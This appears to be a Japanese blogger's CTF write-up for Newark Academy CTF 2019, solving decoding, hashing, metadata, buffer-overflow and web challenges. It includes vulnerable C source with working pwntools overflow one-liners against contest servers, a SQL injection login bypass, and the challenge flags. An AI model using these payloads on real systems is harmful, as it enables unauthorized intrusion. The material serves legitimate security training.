Newark Academy CTF 2019 忘備録

General Skills

Intro to Flags

Your flag is nactf{w3lc0m3_t0_th3_m4tr1x}.
FLAG : nactf{w3lc0m3_t0_th3_m4tr1x}

Join the Discord

Go to the NACTF home page and find the link to the Discord server. A flag will be waiting for you once you join. So will Austin.

f:id:Yunolay:20190918133522p:plain

FLAG : nactf{g00d_luck_h4v3_fun}

What the HEX?

What the HEX man! My friend Elon just posted this message and I have no idea what it means >:( Please help me decode it:

https://twitter.com/kevinmitnick/status/1028080089592815618?lang=en

Leave the text format: no need to add nactf{} or change punctuation/capitalization

ツイッターを見ると f:id:Yunolay:20190918133741p:plain

From Hexでdecode

f:id:Yunolay:20190918134020p:plain

FLAG : I was. Sorry to have missed you.

Off-base

It seems my friend Rohan won't stop sending cryptic messages and he keeps mumbling something about base 64. Quick! We need to figure out what he is trying to say before he loses his mind...

bmFjdGZ7YV9jaDRuZzNfMGZfYmE1ZX0=

base64でdecode

echo bmFjdGZ7YV9jaDRuZzNfMGZfYmE1ZX0= | base64 -d
FLAG : nactf{a_ch4ng3_0f_ba5e}

Cat over the wire

Open up a terminal and connect to the server at shell.2019.nactf.com on port 31242 and get the flag!

Use this netcat command in terminal:

nc shell.2019.nactf.com 31242

接続しただけでフラグもらえた

$ nc shell.2019.nactf.com 31242
nactf{th3_c4ts_0ut_0f_th3_b4g}
FLAG : nactf{th3_c4ts_0ut_0f_th3_b4g}

Grace's HashBrowns

Grace was trying to make some food for her family but she really messed it up. She was trying to make some hashbrowns but instead, she made this:

f5525fc4fc5fdd42a7cf4f65dc27571c

I guess Grace is a really bad cook. But at least she tried to add some md5 sauce.

remember to put the flag in nactf{....}

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc. に投げる

f:id:Yunolay:20190918134747p:plain

FLAG : nactf{grak}

Get a GREP #0!

Vikram was climbing a chunky tree when he decided to hide a flag on one of the leaves. There are 10,000 leaves so there's no way you can find the right one in time... Can you open up a terminal window and get a grep on the flag?

bigtree.zip

階層構造になっててフラグを探すように見える。
nactfで検索かける。

Windowsでフォルダ内の文字列検索をしてファイルに出力する方法 | みずねノート

$ findstr /s /i /n "nactf" *.txt
bigtree\branch8\branch3\branch5\leaf8351.txt:1:nactf{v1kram_and_h1s_10000_l3av3s}
FLAG : nactf{v1kram_and_h1s_10000_l3av3s}

Crypto

Vyom's Soggy Croutons

Vyom was eating a CAESAR salad with a bunch of wet croutons when he sent me this:

ertkw{vk_kl_silkv}

Can you help me decipher his message?

The20thDuck

carsar cipherのROT9

f:id:Yunolay:20190918131419p:plain

FLAG : nactf{et_tu_brute}

Forensics

The MetaMeme

Phil sent me this meme and its a little but suspicious. The meme is super meta and it may be even more meta than you think.

Wouldn't it be really cool if it also had a flag hidden somewhere in it? Well you are in luck because it certainly does!

pdfinfoでmetadataを見る

$ pdfinfo metametametameta.pdf 
Subject:        nactf{d4mn_th15_1s_s0_m3t4}
Creator:        3-Heights(TM) Image to PDF Converter 4.10.16.0 (www.pdf-tools.com)
Producer:       3-Heights(TM) Image to PDF Converter Shell 4.10.16.0 (http://www.pdf-tools.com)
CreationDate:   Thu Aug 15 02:15:13 2019 EDT
ModDate:        Thu Aug 15 02:15:13 2019 EDT
Tagged:         no
UserProperties: no
Suspects:       no
Form:           none
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      742.5 x 407.25 pts
Page rot:       0
File size:      81951 bytes
Optimized:      no
PDF version:    1.7
FLAG : nactf{d4mn_th15_1s_s0_m3t4}

Binary Exploitation

BufferOverflow #0

The close cousin of a website for "Question marked as duplicate"

Can you cause a segfault and get the flag?

shell.2019.nactf.com:31475

bufover-0, bufover-0.c

bufover-0.c

#include <stdio.h>
#include <signal.h>

void win()
{
    printf("You win!\n");
    char buf[256];
    FILE* f = fopen("./flag.txt", "r");
    if (f == NULL)
    {
        puts("flag.txt not found - ping us on discord if this is happening on the shell server\n");
    }
    else
    {
        fgets(buf, sizeof(buf), f);
        printf("flag: %s\n", buf);
    }
}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    /* Call win() on SIGSEGV */
    signal(SIGSEGV, win);

    vuln();
    return 0;
}

win()に飛ばせば勝ち。

$ r2 bufover-0
 -- radare2 for FideOS, now with extra potato
[0x080490b0]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables
[0x080490b0]> afl
0x080490b0    1 50           entry0
0x080490e3    1 4            fcn.080490e3
0x08049080    1 6            sym.imp.__libc_start_main
0x08049110    4 49   -> 40   sym.deregister_tm_clones
0x08049150    4 57   -> 53   sym.register_tm_clones
0x08049190    3 33   -> 30   entry.fini0
0x080491c0    1 2            entry.init0
0x08049330    1 1            sym.__libc_csu_fini
0x08049100    1 4            sym.__x86.get_pc_thunk.bx
0x0804923f    1 60           sym.vuln
0x08049030    1 6            sym.imp.printf
0x08049040    1 6            sym.imp.gets
0x08049334    1 20           sym._fini
0x080492d0    4 85           sym.__libc_csu_init
0x080491c2    4 125          sym.win
0x080490f0    1 1            sym._dl_relocate_static_pie
0x0804927b    1 73           main
0x08049090    1 6            sym.imp.setvbuf
0x08049070    1 6            sym.imp.__sysv_signal
0x08049000    3 32           sym._init
0x08049050    1 6            sym.imp.fgets
0x08049060    1 6            sym.imp.puts
0x080490a0    1 6            sym.imp.fopen

winは0x080491c2

$ python -c "from pwn import *; print b'A'*28+p32(0x080491c2)" | nc shell.2019.nactf.com 31475
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAA!
You win!
flag: nactf{0v3rfl0w_th4at_buff3r_18ghKusB}
FLAG : nactf{0v3rfl0w_th4at_buff3r_18ghKusB}

BufferOverflow #1

The close cousin of a website for "Question marked as duplicate" - part 2!

Can you redirect code execution and get the flag?

Connect at shell.2019.nactf.com:31462
#include <stdio.h>

void win()
{
    printf("You win!\n");
    char buf[256];
    FILE* f = fopen("./flag.txt", "r");
    if (f == NULL)
    {
        puts("flag.txt not found - ping us on discord if this is happening on the shell server\n");
    }
    else
    {
        fgets(buf, sizeof(buf), f);
        printf("flag: %s\n", buf);
    }
}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    vuln();
    return 0;
}

0と同じだった。

$ python -c "from pwn import *; print b'A'*28+p32(0x080491b2)" | nc shell.2019.nactf.com 31462
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAA��!
You win!
flag: nactf{pwn_31p_0n_r3t_iNylg281}
FLAG : nactf{pwn_31p_0n_r3t_iNylg281}

Web Exploitation

Pink Panther

Rahul loves the Pink Panther. He even made this website:

http://pinkpanther.web.2019.nactf.com

I think he hid a message somewhere on the webpage, but I don't know where... can you INSPECT and find the message?

https://www.youtube.com/watch?v=2HMSnfeNf8c

アクセスするとまさにピンクパンサー f:id:Yunolay:20190918142434p:plain

ソース見たらフラグがあった f:id:Yunolay:20190918142509p:plain

FLAG : nactf{1nsp3ct_b3tter_7han_c10us3au}

Scooby Doo

Kira loves to watch Scooby Doo so much that she made a website about it! She also added a clicker game which looks impossible. Can you use your inspector skills from Pink Panther to reveal the flag?

http://scoobydoo.web.2019.nactf.com

f:id:Yunolay:20190918142633p:plain

ゲームに移動すると1,000,000,000回クリックしろと言われる。
マウスを近づけると逃げる系。しかしクリック出来ないわけではない。

f:id:Yunolay:20190918142810p:plain

Inspecterで描画処理をしているanimation.jsにbrakepointをつける

f:id:Yunolay:20190918143630p:plain

clickCountで比較しているようなので値を書き換えたらフラグが得られた。

f:id:Yunolay:20190918143721p:plain

f:id:Yunolay:20190918143724p:plain

FLAG : nactf{ult1m4T3_sh4ggY}

Dexter's Lab

Dee Dee,

Please check in on your brother's lab at dexterslab.web.2019.nactf.com We know his username is Dexter, but we don't know his password! Maybe you can use a SQL injection?

f:id:Yunolay:20190918145830p:plain

適当にいれるとクエリ表示してくれる。

f:id:Yunolay:20190918145850p:plain

いつもので通った

admin' or 1=1;#

f:id:Yunolay:20190918145920p:plain

FLAG : nactf{1nj3c7ion5_ar3_saf3_in_th3_l4b}

あとがき

MidakeCTFとかぶってしまって余りプレイ出来なかった。ときながら書いてた分だけとりあえず上げます。

セキュリティコンテストチャレンジブック -CTFで学ぼう! 情報を守るための戦い方-

セキュリティコンテストチャレンジブック -CTFで学ぼう! 情報を守るための戦い方-